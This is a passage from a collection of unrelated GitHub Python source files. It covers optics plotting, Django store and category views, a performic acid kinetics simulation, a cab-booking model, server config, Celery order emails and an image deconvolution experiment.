\"\"\"\n geometry=psi_e.geometry\n mask = (abs(geometry.x)<=geometry.xmax)\n e_phase = psi_e.phase_rectified\n phase_avg,phase_rms=psi_e.phase_moments()\n if e_0.paraxial:\n paraxial='paraxial'\n else:\n paraxial='non-paraxial'\n gouy = e_0.get_gouy(geometry.L)\n \n plt.title(r\"Corrected phase of slowly-varying field at z=L plane\"+\"\\n\" +f\"({paraxial} propagation of {e_0.l}{e_0.p})\" +\"\\n\"+ \\\n f\"Average phase = {phase_avg:.4f}, RMS phase = {phase_rms:.4f}\"+\"\\n\"+\\\n f\"Paraxial phase = {gouy:.4f}\" \"\\n\"+ \\\n f\"1/(8k(Rm-L)={1/(8*geometry.k*(geometry.Rm-geometry.L)):.5f}, L={geometry.L}, Rm={geometry.Rm}\",fontsize=10)\n plt.xlabel(r'$x \\;[\\mu m]$')\n plt.ylabel(r\"$Arg \\psi \\;[rad]$\")\n plt.plot(abs(geometry.x[mask]),e_phase[mask])#,label=r'$\\psi(z=L)\\cdot \\exp(ik\\Delta z)$')\n plt.axhline(gouy,xmin=min(abs(geometry.x)),xmax=geometry.xmax,ls='--',color='r',label=f'Paraxial phase {gouy:.4f}')\n plt.axhline(phase_avg,xmin=min(abs(geometry.x)),xmax=geometry.xmax,ls='--',color='k',label=rf'Average phase: {phase_avg:.4f}')\n plt.legend()\n plt.savefig(f\"Figures/paraxial{geometry.Rm}_fullx.pdf\",bbox_inches=\"tight\")\n plt.show()\n\ndef plot_decomposition(psi_e_mirr:Field1D,Psi_0:Mode):\n\n psi_e_mirr=psi_e_mirr.phase_shift()\n geometry=psi_e_mirr.geometry\n ps,alphas,e_decomposed = modal_decomposition(psi_e_mirr,Psi_0)\n\n l=Psi_0.l;p=Psi_0.p\n title_string=\"Modal decomposition of the phase shifted field at the curved mirror \\n\"\n for i in range(len(alphas)):\n if i == len(alphas)-1:\n title_string+=f\"{abs(alphas[i])**2:.4f}\"+rf\"LG$_{l}$$_{ps[i]}$\"\n else:\n title_string+=f\"{abs(alphas[i])**2:.4f}\"+rf\"LG$_{l}$$_{ps[i]}$+\"\n title_string+=f\"\\n {l}{p} mode at z=0\"\n plt.figure()\n plt.title(title_string)\n plt.xlabel(r\"x [$\\mu m$]\");plt.ylabel(r\"Abs(field) [$V\\mu m^{-1}$]\")\n plt.plot(abs(geometry.x),psi_e_mirr.abs,'.',label=r\"$\\psi_{mirr}$\")\n plt.plot(abs(geometry.x),e_decomposed[0].abs,'r',alpha=0.75,label=\"Decomposed field\")\n plt.legend()\n plt.show()","repo_name":"darstar/resonant_optical_microcavities","sub_path":"plot_routines.py","file_name":"plot_routines.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31691854294","text":"from django.shortcuts import render\n\nfrom django.views.generic import ListView, DetailView, TemplateView\n\n# product models\nfrom store.models import Category, Product, ProductImages, Banner\n\n\nclass HomeListView(TemplateView):\n def get(self, request, *args, **kwargs):\n products = Product.objects.all().order_by('-id')\n banners = Banner.objects.filter(is_active=True).order_by('-id')[0:3]\n\n context = {\n 'products': products,\n 'banners': banners\n }\n return render(request, 'store/index.html', context)\n\n def post(self, request, *args, **kwargs):\n if request.method == 'post' or request.method == 'POST':\n search_product = request.POST.get('search_product')\n products = Product.objects.filter(name__icontains=search_product).order_by('-id')\n\n context = {\n 'products': products\n }\n return render(request, 'store/index.html', context)\n\n\n\nclass ProductDetailView(DetailView):\n model = Product\n template_name = 'store/product.html'\n context_object_name = 'item'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['product_images'] = ProductImages.objects.filter(product=self.object.id)\n return context\n\n\n # item.get_product_url\n\n# def product_details(request, pk):\n# item = Product.objects.get(id=pk)\n# photos = ProductImages.objects.filter(product=item).order_by('-created')\n# context = {\n# 'item': item,\n# 'photos': photos,\n# }\n# return render(request, 'store/product.html', context)\n\n","repo_name":"alfinarif/ecommerce-application-v2","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19854864417","text":"import math\nimport matplotlib.pyplot as plt\nfrom ChemData import ChemData\n\ngA = 250\ngB = 250\ngC = 0\ngD = 50\n\nngA = gA\nngB = gB * .7\nngC = 0\nngD = gD + (gB * .3)\n\nmolesA = ngA / ChemData[\"Formic Acid\"][\"MW\"]\nmolesB = ngB / ChemData[\"70% H2O2\"][\"MW\"]\nmolesC = ngC / ChemData[\"Peraformic Acid\"][\"MW\"]\nmolesD = ngD / ChemData[\"Water\"][\"MW\"]\n\nvolume = (gA * ChemData[\"Formic Acid\"][\"DEN\"] + gB * ChemData[\"70% H2O2\"][\"DEN\"] + gC *\n ChemData[\"Peraformic Acid\"][\"DEN\"] + gD * ChemData[\"Water\"][\"DEN\"]) / 1000\nprint(volume)\n\nMA = molesA / volume\nMB = molesB / volume\nMC = molesC / volume\nMD = molesD / volume\n\nminutes = 500\ns_conA = MA\ns_conB = MB\ns_conC = MC\ns_conD = MD\ncat_con = 0\ntemperature = 325\nk1 = (1.20 * 10 ** -3) * math.exp((-55304 / 8.314) * (1 / temperature - 1 / 323))\nk2 = (1.60 * 10 ** -4) * math.exp((-105073 / 8.314) * (1 / temperature - 1 / 323))\nKe = 1.60 * math.exp((-10000 / 8.314) * (1 / 298 - 1 / temperature))\n\nconA = s_conA\nconB = s_conB\nconC = s_conC\nconD = s_conD\nseconds = 1\ncon_A = [conA]\ncon_B = [conB]\ncon_C = [conC]\ncon_D = [conD]\nwatts_list = [0]\nenergy = 0\nH_concentration = math.sqrt(s_conA * (1.8 * 10 ** -4))\n\ndecomp_enthalpy = -100000\nstd_enthalpy = -4840\nrxn_enthalpy = std_enthalpy + (((ChemData[\"Peracetic Acid\"][\"Cp\"] + ChemData[\"Water\"][\"Cp\"]) - (\n ChemData[\"70% H2O2\"][\"Cp\"] + ChemData[\"Glacial Acetic Acid\"][\"Cp\"])) * (temperature - 298.15))\n\nwhile seconds < minutes * 60:\n rate1 = (k1 * conA * conB * H_concentration) * (1 - (((conC * conD) / (conA * conB)) * (1 / Ke)))\n rate2 = (k2 * conC)\n conA = conA - rate1\n conB = conB - rate1\n conC = conC + rate1 - rate2\n conD = conD + rate1 + rate2\n con_A.append(conA), con_B.append(conB), con_C.append(conC), con_D.append(conD)\n keq = (conC * conD) / (conA * conB)\n moles_PfA_Formed = rate1 * volume\n moles_PFA_Decomp = rate2 * volume\n energy = energy + (rxn_enthalpy * molesC)\n watts = ((moles_PfA_Formed * rxn_enthalpy) + (moles_PFA_Decomp * decomp_enthalpy)) * -1\n watts_list.append(watts)\n print(seconds, conC)\n seconds += 1\n\ndef plot_conc():\n plt.figure(\"Concentration\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Concentration (mol/L)\")\n plt.xlim(0, minutes * 60), plt.ylim(0, 8)\n plt.plot(con_A), plt.plot(con_B), plt.plot(con_C), plt.plot(con_D)\n plt.show()\n\ndef plot_watts():\n plt.figure(\"Reaction Watts\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Watts\")\n plt.xlim(0, minutes * 60), plt.ylim(0, max(watts_list) * 1.1)\n plt.plot(watts_list)\n plt.show()\n\n\nplot_conc()\n","repo_name":"akarl2/Monte_Karlo","sub_path":"PFA_Seconds.py","file_name":"PFA_Seconds.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39684358197","text":"import math\n\n\nclass Places:\n _locationsMap = {\"Los-Angeles\": (5.3, 2.7),\n \"San-Jose\": (3.9, 5.0),\n \"San-Francisco\": (7, 5),\n \"Fremont\": (10, 6.9),\n \"Santa-Clara\": (16.7, 6.8)\n }\n\n def __init__(self, _locationsMap):\n self._locationsMap = _locationsMap\n\n def getLocation(self, locationName: str) -> tuple:\n return self._locationsMap[locationName]\n\n def isLocationPresent(self, locationName: str) -> bool:\n return locationName in self._locationsMap\n\n def getDistance(self, location1: tuple, location2: tuple) -> int:\n location1 = self._locationsMap[location1]\n location2 = self._locationsMap[location2]\n\n distance = math.sqrt(\n (location1[0] - location2[0])**2 + (location1[1] - location2[1])**2)\n return math.ceil(distance)\n\n\nclass RideClient:\n _id = 0\n\n __slots__ = [\"customerName\", \"customerEmail\", \"id\"]\n\n def __init__(self, customerName):\n self.customerName = customerName\n self.customerEmail = \"\"\n self.id = RideClient._id\n RideClient._id += 1\n\n\nclass InitiateBookingRequest:\n _id = 0\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"assignedDriver\"]\n\n def __init__(self):\n self.id = None\n self.customerId = None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.assignedDriver = None\n\n @staticmethod\n def create():\n bookingRequest = InitiateBookingRequest()\n bookingRequest.id = InitiateBookingRequest._id\n InitiateBookingRequest._id += 1\n return bookingRequest\n\n\nclass RideBookingOrder:\n _id = 0\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"price\", \"tax\", \"assignedDriver\"]\n\n def __init__(self):\n self.id = None\n self.customerId = None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.price = 0.00\n self.tax = 0.00\n self.assignedDriver = None\n\n @staticmethod\n def create():\n bookingOrder = RideBookingOrder()\n bookingOrder.id = RideBookingOrder._id\n RideBookingOrder._id += 1\n return bookingOrder\n\n\nclass CustomerBill:\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"assignedDriver\", \"price\", \"tax\", \"totalCost\"]\n\n def __init__(self):\n self.customerId = None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.assignedDriver = None\n self.price = 0.00\n self.tax = 0.00\n self.totalCost = 0.00\n\n\nclass Drivers:\n _drivers = {\n 1: {\"name\": \"Sean\", \"dedicatedRoutes\": [\"Los-Angeles\", \"San-Jose\"], \"Status\": \"Available\", \"CarModel\": \"Hyundai\"},\n 2: {\"name\": \"Dan\", \"dedicatedRoutes\": [\"Santa-Clara\", \"Fremont\"], \"Status\": \"Available\", \"CarModel\": \"Honda\"},\n 3: {\"name\": \"Pat\", \"dedicatedRoutes\": [\"Santa-Clara\", \"San-Diego\"], \"Status\": \"Available\", \"CarModel\": \"Mazda\"},\n 4: {\"name\": \"Jenny\", \"dedicatedRoutes\": [\"Cupertino\", \"Fremont\"], \"Status\": \"Available\", \"CarModel\": \"Mercedes\"},\n 5: {\"name\": \"Aladin\", \"dedicatedRoutes\": [\"San-Diego\", \"San-Francisco\"], \"Status\": \"Available\", \"CarModel\": \"Volvo\"},\n }\n\n def __init__(self, _drivers):\n self._drivers = _drivers\n\n def getEligibleDrivers(self, locationName):\n eligible_drivers = {key: value for key, value in self._drivers.items(\n ) if locationName in value[\"dedicatedRoutes\"]}\n return eligible_drivers\n\n def assignDriver(self, locationName):\n availableDriverKeys = self.getEligibleDrivers(locationName).keys()\n if not availableDriverKeys:\n return None\n availableDriver = list(availableDriverKeys)[-1]\n self._drivers[availableDriver][\"Status\"] = \"Booked\"\n driverToRemove = {key: value for key,\n value in self._drivers.items() if key == availableDriver}\n assignedDriver = driverToRemove, self._drivers.pop(availableDriver)\n return assignedDriver[0]\n\n def getAvailableDrivers(self):\n return self._drivers\n\n\nclass CabService:\n _costPerMile = 2.5\n _tax = [0.05, 0.10, 0.15]\n\n def __init__(self, chaffeur: Drivers, route: Places):\n self.chaffeur = chaffeur\n self.route = route\n self._patronageRecord = {}\n\n def getTax(self):\n return self._tax\n\n def bookARide(self, bookingRequest: InitiateBookingRequest) -> RideBookingOrder:\n rideOrder = RideBookingOrder.create()\n rideOrder.customerId = bookingRequest.customerId\n rideOrder.customerName = bookingRequest.customerName\n rideOrder.customerEmail = bookingRequest.customerEmail\n rideOrder.pickUpLocation = bookingRequest.pickUpLocation\n rideOrder.dropOffLocation = bookingRequest.dropOffLocation\n rideOrder.distance = bookingRequest.distance\n rideOrder.assignedDriver = bookingRequest.assignedDriver\n\n rideOrder = self._pairWithADriver(rideOrder)\n\n if rideOrder != None:\n self._patronageRecord[rideOrder.id] = rideOrder\n return rideOrder\n\n def _pairWithADriver(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n if rideOrder.pickUpLocation not in self.route._locationsMap:\n return None\n\n rideOrder.assignedDriver = self.chaffeur.assignDriver(\n rideOrder.pickUpLocation)\n\n return rideOrder\n\n def _computeDistance(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n rideOrder.distance = self.route.getDistance(rideOrder.pickUpLocation,\n rideOrder.dropOffLocation)\n return rideOrder\n\n def _costEstimator(self, rideOrder: RideBookingOrder) -> RideBookingOrder:\n totalDistance = self.route.getDistance(\n rideOrder.pickUpLocation, rideOrder.dropOffLocation)\n rideOrder.price = self._costPerMile * totalDistance\n return rideOrder\n\n def _endRide(self, rideOrder: RideBookingOrder) -> CustomerBill:\n invoice = CustomerBill()\n\n if rideOrder.price <= 10:\n totalCost = rideOrder.price * self._tax[0] + rideOrder.price\n elif rideOrder.price > 10 and rideOrder.price < 20:\n totalCost = rideOrder.price * self._tax[1] + rideOrder.price\n else:\n totalCost = rideOrder.price * self._tax[2] + rideOrder.price\n\n totalCost = totalCost\n\n invoice.totalCost = totalCost\n invoice.customerId = rideOrder.customerId\n invoice.customerName = rideOrder.customerName\n invoice.customerEmail = rideOrder.customerEmail\n invoice.pickUpLocation = rideOrder.pickUpLocation\n invoice.dropOffLocation = rideOrder.dropOffLocation\n invoice.distance = rideOrder.distance\n invoice.price = rideOrder.price\n invoice.assignedDriver = rideOrder.assignedDriver\n\n if rideOrder.price <= 10:\n taxApplied = self._tax[0]\n elif rideOrder.price > 10 and rideOrder.price < 20:\n taxApplied = self._tax[1]\n elif rideOrder.price >= 20:\n taxApplied = self._tax[2]\n invoice.tax = taxApplied\n return invoice\n","repo_name":"seniroberts/Expressions","sub_path":"Python/MiniProjects/TaxiService/CabService.py","file_name":"CabService.py","file_ext":"py","file_size_in_byte":7714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7264521169","text":"from django.shortcuts import redirect, render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom category import models\n\nfrom category.models import Category\n\n\ndef category(request):\n cat=Category.objects.all()\n context={\n 'cat': cat\n }\n return render(request,'admin_side/category.html',context)\n\n\n\n\n@login_required(login_url='admin_login')\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == 'POST':\n category_name = request.POST.get('name')\n cat_image = request.FILES.get('image')\n description = request.POST.get('description')\n new_category = Category(\n cat_image=cat_image,\n category_name=category_name,\n description=description\n )\n \n new_category.save()\n return redirect('category:category')\n return render(request,'admin_side/add_category.html')\n\n else:\n # Handle the case where the user is not a superuser (optional)\n return redirect('admin_login')\n\n\n\n\nlogin_required(login_url='admin_login')\ndef edit_category(request, cat_id):\n if request.user.is_superuser:\n if request.method=='POST':\n category_name=request.POST.get('category_name')\n \n description=request.POST.get('description')\n cat = Category.objects.get(id=cat_id)\n if Category.objects.filter(category_name = category_name , description = description).exists():\n messages.error(request,'already taken')\n print('already taken')\n return redirect('category:category')\n cat.category_name = category_name \n \n cat.description = description\n cat_image=request.FILES.get('cat_image')\n if cat_image:\n cat.cat_image = cat_image\n else:\n pass\n cat.save()\n \n cat=Category.objects.all().order_by('id')\n context={\n cat:'cat'\n }\n return redirect('category:category')\n return render(request,'admin_side/edit_category.html')\n\n\ndef delete_category(request,cat_id): \n \n try :\n category_to_delete = Category.objects.get(id=cat_id)\n category_to_delete.delete()\n messages.success(request,'delete successfully')\n except Category.DoesNotExist:\n messages.error(request,'item does not exist')\n return redirect ('category:category')\n ","repo_name":"Shibinashiq/ecommerce","sub_path":"category/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20237164485","text":"bind = '0.0.0.0:3080'\n\nworkers = 4\n\nproc_name = 'app'\n\nloglevel = 'debug'\n\nlogfile = './log/debug.log'\n\naccesslog = \"./log/access.log\"\naccess_log_format = '%(h)s %(l)s %(u)s %(t)s \"%(r)s\" %(s)s %(b)s %(D)d'\n\ntimeout = 90\n\nkeepalive = 75 # needs to be longer than the ELB idle timeout\n\nworker_class = 'gevent'\n","repo_name":"Wanke15/k8s-learn","sub_path":"conf/gunicorn.py","file_name":"gunicorn.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8442036352","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ValidationError\nfrom mecc.apps.utils.queries import rules_degree_for_year, rules_since_ever\nfrom mecc.apps.institute.models import Institute\nfrom mecc.apps.utils.queries import currentyear\n\n\nclass DegreeType(models.Model):\n \"\"\"\n Degree Type model\n \"\"\"\n display_order = models.IntegerField(\n _('Numéro ordre affichage'), unique=False)\n is_in_use = models.BooleanField(_('En service'))\n short_label = models.CharField(_('Libellé court'), max_length=40)\n long_label = models.CharField(_('Libellé long'), max_length=70)\n ROF_code = models.CharField(\n _('Correspondance ROF'), max_length=2, blank=True, null=True)\n\n def __str__(self):\n return self.short_label\n\n class Meta:\n ordering = ['display_order', 'short_label']\n permissions = (\n ('can_view_degree_type',\n _('Peut voir les types de diplôme')),\n )\n\n def get_absolute_url(self):\n return reverse('degree:type')\n\n def clean_fields(self, exclude=None):\n if self.display_order is None or self.display_order < 0:\n raise ValidationError({'display_order': [\n _('L\\'ordre d\\'affichage doit être positif.'),\n ]})\n if not self.is_in_use:\n c = currentyear()\n rules = rules_degree_for_year(\n self.pk, c.code_year) if self.pk is not None else None\n if rules is None:\n return\n else:\n raise ValidationError(_('La mise hors service ne peut s\\'effectuer \\\n que si aucune règle n\\'y est rattachée pour l\\'année \\\n universitaire \\n %s' % [e.label for e in rules]))\n\n def delete(self):\n rules = rules_since_ever(self.pk) if self.pk is not None else None\n if rules is None:\n super(DegreeType, self).delete()\n else:\n raise ValidationError(_(\"Vous ne pouvez pas supprimer un type \\\n de diplôme qui contient des règles\"))\n\n\nclass Degree(models.Model):\n \"\"\"\n Degree model\n \"\"\"\n label = models.TextField(_(\"Libellé réglementaire\"))\n degree_type = models.ForeignKey(\n DegreeType, verbose_name=_(\"Type de diplôme\"))\n degree_type_label = models.CharField(\n _('Libellé du type de diplôme'), max_length=120)\n is_used = models.BooleanField(_('En service'), default=True)\n start_year = models.IntegerField(_('Code année de début de validité'))\n end_year = models.IntegerField(_('Code année de fin de validité'))\n ROF_code = models.CharField(_(\"Référence Programme ROF\"), max_length=20)\n APOGEE_code = models.CharField(\n _(\"Référence dans le SI Scolarité (APOGEE)\"), max_length=40)\n institutes = models.ManyToManyField(Institute)\n\n @property\n def get_id_type(self):\n return self.degree_type.id\n\n @property\n def get_short_label_type(self):\n return self.degree_type.short_label\n\n class Meta:\n ordering = ['degree_type_label', 'label']\n","repo_name":"unistra/eva","sub_path":"mecc/apps/degree/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8003924157","text":"\"\"\"src/tasks/tasks.py\"\"\"\n\nimport smtplib\nfrom email.message import EmailMessage\n\nfrom celery import Celery\nfrom src.config import SMTP_HOST, SMTP_PASS, SMTP_PORT, SMTP_USER\nfrom src.domain.orders import OrderPublic\nfrom src.domain.users import User\n\ncelery = Celery(\"tasks\", broker=\"redis://localhost:6379\")\n\n\ndef get_email(user: User, subject: str, orders: list[OrderPublic]):\n \"\"\"Email message options\"\"\"\n\n email = EmailMessage()\n email[\"Subject\"] = subject\n email[\"From\"] = SMTP_USER\n email[\"To\"] = user.email\n\n # Create the email content using the orders_public list and the user object\n if user.is_manager:\n email_content = (\n f\"Dear {user.first_name},\\n\\n\"\n f\"The following orders have been updated:\\n\"\n )\n for order in orders:\n email_content += (\n f\"- Order ID: {order.id},\\n\"\n f\"- Product ID: {order.product_id},\\n\"\n f\"- Quantity: {order.amount},\\n\"\n f\"- Delivery Address: {order.delivery_address},\\n\"\n f\"- Order Date: {order.order_date}\\n\"\n )\n else:\n email_content = (\n f\"Dear {user.first_name} {user.last_name},\\n\\n\"\n f\"The following orders have been updated:\\n\"\n )\n for order in orders:\n email_content += (\n f\"- Product ID: {order.product_id},\\n\"\n f\"Quantity: {order.amount},\\n\"\n f\"Order Date: {order.order_date}\\n\"\n )\n\n email_content += \"\\nBest regards,\\nYour FastAPI Store\"\n\n email.set_content(email_content)\n\n return email\n\n\n@celery.task\ndef send_email(user_: User, subject_: str, orders_: list[OrderPublic]):\n \"\"\"Send Email message\"\"\"\n\n email = get_email(user=user_, subject=subject_, orders=orders_)\n with smtplib.SMTP_SSL(SMTP_HOST, SMTP_PORT) as server:\n server.login(SMTP_USER, SMTP_PASS)\n server.send_message(email)\n","repo_name":"Rostyslav-Coder/FastAPI_Store","sub_path":"src/celery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25764167607","text":"# import packages\nimport os\nimport sys\nfrom pathlib import Path\nsys.path.append(str(Path(__file__).resolve().parent.parent/\"training\"))\nimport random\n\nimport argparse\nimport numpy as np\nfrom numpy.fft import fft2, ifft2\nimport pandas as pd\nimport skimage.io as io\nfrom skimage.metrics import peak_signal_noise_ratio, structural_similarity, mean_squared_error\nfrom skimage.filters import gaussian\nfrom pypher.pypher import psf2otf\nimport matplotlib.pyplot as plt\n\n# import our Adam-based deconvolution code\nfrom helper.deconv_adam import *\nimport trainer\nimport training.utils\n\n# random.seed(2022)\n\n# helper function for computing a 2D Gaussian convolution kernel\ndef fspecial_gaussian_2d(size, sigma):\n kernel = np.zeros(tuple(size))\n kernel[size[0]//2, size[1]//2] = 1\n kernel = gaussian(kernel, sigma)\n return kernel/np.sum(kernel)\n\ndef deconvolve(img,b,c,lam,num_iters,learning_rate,prior_name,model):\n x_adam_prior = np.zeros(np.shape(b))\n for it in range(3):\n x_adam_prior[:, :, it] = deconv_adam_tv(b[:, :, it], c, lam, num_iters, learning_rate, prior_name, device, model=model)\n # clip results to make sure it's within the range [0,1]\n x_adam_prior = np.clip(x_adam_prior, 0.0, 1.0)\n # compute PSNR using skimage library and round it to 2 digits\n PSNR_ADAM_PRIOR = round(peak_signal_noise_ratio(img, x_adam_prior), 1)\n SSIM_ADAM_PRIOR = structural_similarity(img,x_adam_prior,data_range=x_adam_prior.max()-x_adam_prior.min(),multichannel=True)\n MSE_ADAM_PRIOR = mean_squared_error(img,x_adam_prior)\n return x_adam_prior, PSNR_ADAM_PRIOR, SSIM_ADAM_PRIOR, MSE_ADAM_PRIOR\n\ndef blur_image(img):\n # simulated measurements for all 3 color channels\n b = np.zeros(np.shape(img))\n for it in range(3):\n b[:, :, it] = blur_kernel(img[:, :, it]) + NOISE_SIGMA * np.random.randn(img.shape[0], img.shape[1])\n return b\n\ndef calc_metrics_all_priors(img, b, c, prior_list, lam, num_iters, learning_rate,model):\n \"\"\"\n Deconvolves and calculates metrics for all priors\n img: true image\n b: blurred image\n c: blur kernel\n lam: weighting of prior term\n model: model for cross entropy and kl divergence prior\n \"\"\"\n x_all = []\n PSNRS = []\n MSES = []\n SSIMS = []\n for i in range(len(prior_list)):\n # run PyTorch-based Adam solver for each color channel with different regularizers\n img_run = img.copy()\n b_run = b.copy()\n x_adam, PSNR_adam, SSIM_adam, MSE_adam = deconvolve(img_run,b_run,c,lam,num_iters,learning_rate,prior_list[i],model=model)\n x_all.append(x_adam)\n PSNRS.append(PSNR_adam)\n SSIMS.append(SSIM_adam)\n MSES.append(MSE_adam)\n return x_all, PSNRS, SSIMS, MSES\n\n\n\nif __name__==\"__main__\":\n #For different experiments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-b\",help=\"blur kernel set select, 0,1,or 2\", type=int, required=True)\n parser.add_argument(\"-l\",help=\"Lamda set select, 0,1\", type=int, required=True)\n parser.add_argument(\"-n\",help=\"Noise level set select, 0,1\", type=int, required=True)\n\n args = parser.parse_args()\n \n gpu_id = 0\n \n #Hyperparameters\n BLUR_KERNEL_SET_ALL = [(10,1.5),(30,4.5),(60,6.5)]\n LAM_ALL = [0.05,0.5]\n NOISE_ALL = [0.15,0.05]\n \n idx_blur_kernel = args.b\n idx_lam = args.l\n idx_noise = args.n\n \n BLUR_KERNEL_SET = BLUR_KERNEL_SET_ALL[idx_blur_kernel]\n BLUR_SIZE = (BLUR_KERNEL_SET[0],BLUR_KERNEL_SET[0])\n BLUR_SIGMA = BLUR_KERNEL_SET[1]\n NOISE_SIGMA = NOISE_ALL[idx_noise]\n # NOISE_SIGMA = 0.05\n \n SAMPLE = 150\n LAM = LAM_ALL[idx_lam] # relative weight of prior term\n NUM_ITERS = 75 # number of iterations for Adam\n LEARNING_RATE = 5e-2 # learning rate\n FILE_NAME = f\"./results/fullexp_{BLUR_SIZE[0]}_{BLUR_SIGMA}_{NOISE_SIGMA}_{LAM}.npy\"\n PRIOR_LIST = [\"no_prior\",\"anisotropic_tv\",\"isotropic_tv\",\"hessian_schatten\",\"l1\",\"l2\",\"laplacian\",\"maximize_cells\",\"cross_entropy\",\"kl_divergence\"]\n\n\n print(\"Selected Hyperparameters:\")\n print(f\"Blur Kernel: {BLUR_KERNEL_SET}\\nNoise Sigma: {NOISE_SIGMA}\\nLambda: {LAM}\")\n print(f\"Priors order: {PRIOR_LIST}\")\n \n #Different models for different blur and sigma values\n #10, 1.5, 0.15\n if idx_blur_kernel==0:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_10/saved_models/Checkpoint_06Dec12_24_30_1.00.pt\"\n #30, 4.5, 0.15\n elif idx_blur_kernel==1:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_30/saved_models/Checkpoint_06Dec12_34_25_1.00.pt\"\n #60, 6.5, 0.15\n elif idx_blur_kernel==2:\n MODEL_PATH = \"./training/Results/ce_train_v4_gray_60/saved_models/Checkpoint_06Dec12_32_15_1.00.pt\"\n else:\n raise ValueError\n\n print(f\"Model path: {MODEL_PATH}\")\n\n #Load test dataset, we dont use the blur size, sigma, and blur sigma\n DATASET={\n \"subclass_name\": \"ce_prior\",\n \"path\": \"./dataset\",\n \"mask_pth\": \"./dataset/masks\",\n \"blur_size\": BLUR_SIZE[0],\n \"blur_sigma\": BLUR_SIGMA,\n \"sigma\": NOISE_SIGMA,\n \"train_batch_size\": 32,\n \"test_batch_size\": 32,\n \"tile_h\": 256,\n \"tile_w\": 256,\n \"tile_stride_factor_w\": 5,\n \"tile_stride_factor_h\": 5,\n \"lwst_level_idx\": 0,\n \"threshold\": 0.7\n }\n\n #Load model for CE/KL priors\n device = torch.device(f\"cuda:{gpu_id}\")\n model = trainer.Model.create(subclass_name=\"ce_prior\")\n state = torch.load(MODEL_PATH, map_location=device)\n model.load_state_dict(state[\"model_state_dict\"])\n model = model.to(device)\n model.eval()\n\n #disable gradient descent for the model\n for params in model.parameters():\n params.requires_grad=False\n\n #Load dataset\n fulldataset = trainer.Dataset.create(**DATASET)\n dataset = fulldataset.testset.image_dataset\n\n c = fspecial_gaussian_2d(BLUR_SIZE, BLUR_SIGMA)\n cFT = psf2otf(c, (dataset[0].shape[0], dataset[0].shape[1]))\n blur_kernel = lambda x: np.real(ifft2(fft2(x) * cFT))\n\n\n #Run experiment over an image\n img_idx = 56\n img = dataset[img_idx]/255\n b = blur_image(img)\n x_all,psnrs,ssims,mses = calc_metrics_all_priors(img, b, c, PRIOR_LIST, LAM, NUM_ITERS, LEARNING_RATE, model)\n\n img_dir_path = f\"./results/priors_{img_idx}\"\n os.mkdir(img_dir_path)\n fig = plt.figure()\n plt.imshow(img)\n plt.title(\"Target Image\", fontsize=10)\n plt.axis(\"off\")\n plt.savefig(Path(img_dir_path)/\"image.png\")\n\n fig = plt.figure()\n plt.imshow(b)\n plt.title(\"Blurry and Noisy Image,\\nPSNR: {:.2f}\\nSSIM: {:.2f}\".format(peak_signal_noise_ratio(img, b),structural_similarity(img,b,data_range=b.max()-b.min(),multichannel=True)), fontsize=10)\n plt.axis(\"off\")\n plt.savefig(Path(img_dir_path)/\"blurimage.png\")\n\n for i in range(len(PRIOR_LIST)):\n fig = plt.figure()\n plt.imshow(x_all[i])\n plt.title(\"{},\\nPSNR: {:.2f}\\nSSIM: {:.2f}\".format(PRIOR_LIST[i],psnrs[i],ssims[i]), fontsize=10)\n plt.axis(\"off\") \n plt.savefig(Path(img_dir_path)/f\"{PRIOR_LIST[i]}.png\")\n","repo_name":"Vishwesh4/PriorsDeconvolution","sub_path":"get_image.py","file_name":"get_image.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12356470551","text":"# coding: utf-8\n\n\nfrom sympy import symbols\nfrom sympy import Tuple\nfrom sympy import Matrix\nfrom sympy import srepr\nfrom sympy import Symbol\n\nfrom sympde import Constant\n\nfrom sympde.exterior import d, wedge, ip, jp, 